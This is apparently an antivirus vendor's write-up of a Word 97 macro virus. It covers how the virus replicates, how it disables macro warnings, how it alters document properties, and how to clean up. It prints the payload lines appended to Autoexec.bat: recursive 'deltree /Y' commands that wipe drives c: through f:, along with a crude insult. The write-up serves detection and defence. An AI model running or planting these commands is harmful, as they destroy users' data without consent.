Characteristics

This is a virus for Word 97 documents. It is able to replicate under the SR-1 release of Word 97. It will turn off the macro warning feature of Word 97. It's payload is activated on the 17th of every month, then the lines:
deltree /Y f:\*
deltree /Y e:\*
deltree /Y d:\*
deltree /Y c:\*
rem Created by Dream Blaster
rem Minny, you are simply a bitch

are appended to C:\Autoexec.bat, attempting to delete all subdirectories starting from drive f: on the next reboot.

In a 1-in-3 chance this virus also changes the document properties, author to Dream Blaster, title to Macro Carrier, and keywords to Minny. These changes are not reversed during cleaning because VirusScan has no way of know what they were before they were modified. To change them back, open the document, then choose File, then Properties.

This virus consists of a module called ThisDocument. This macro virus will infect Word's normal.dot file.

All Information

Overview -

This is a virus detection. Viruses are programs that self-replicate recursively, meaning that infected systems spread the virus to other systems, which then propagate the virus further. While many viruses contain a destructive payload, it's quite common for viruses to do nothing more than spread from one system to another.
